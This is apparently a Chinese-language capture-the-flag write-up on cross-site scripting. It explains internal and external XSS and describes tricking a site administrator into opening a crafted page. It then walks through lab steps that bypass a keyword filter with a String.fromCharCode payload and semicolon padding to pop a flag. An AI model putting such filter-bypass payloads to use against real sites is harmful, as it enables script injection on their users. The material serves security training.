1>XSS漏洞是Web應用程式中最常見的漏洞之一。如果您的站點沒有預防XSS漏洞的固定方法，那麼就存在XSS漏洞。這個利用XSS漏洞的病毒之所以具有重要意義是因為，難以看到XSS漏洞的威脅，而該病毒則將其發揮得淋漓盡致。

2>XSS攻擊分為兩類，一類是來自內部的攻擊，主要指的是利用程式自身的漏洞，構造跨站語句，如：dvbbs的showerror.asp存在的跨站漏洞。

3>另一類則是來自外部的攻擊，主要指的是自己構造XSS跨站漏洞網頁或者尋找非目標機以外的有跨站漏洞的網頁。如當我們要滲透到一個站點，我們自己構造一個有跨站漏洞的網頁，然後構造跨站語句，欺騙目標伺服器的管理員開啟。

操作

<1.1>輸入http://192.168.1.3/1/index.php,點選提交可以看到題目過濾了XSS三個英文字母。

<1.2>輸入<script>alert(String.fromCharCode(120,115,115))</script>可以繞過。

<1.3>點選提交會彈出flag

<1.4>按f12開啟偵錯程式，在瀏覽器的console裡面輸入alert('xss')即可。

<1.5>按回車會彈出flag

<1.6>訪問http://192.168.1.3/1/flag.php?msg=xss即可獲取flag.

<1.7>使用分號截斷<script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>

<1.8>然後彈出flag。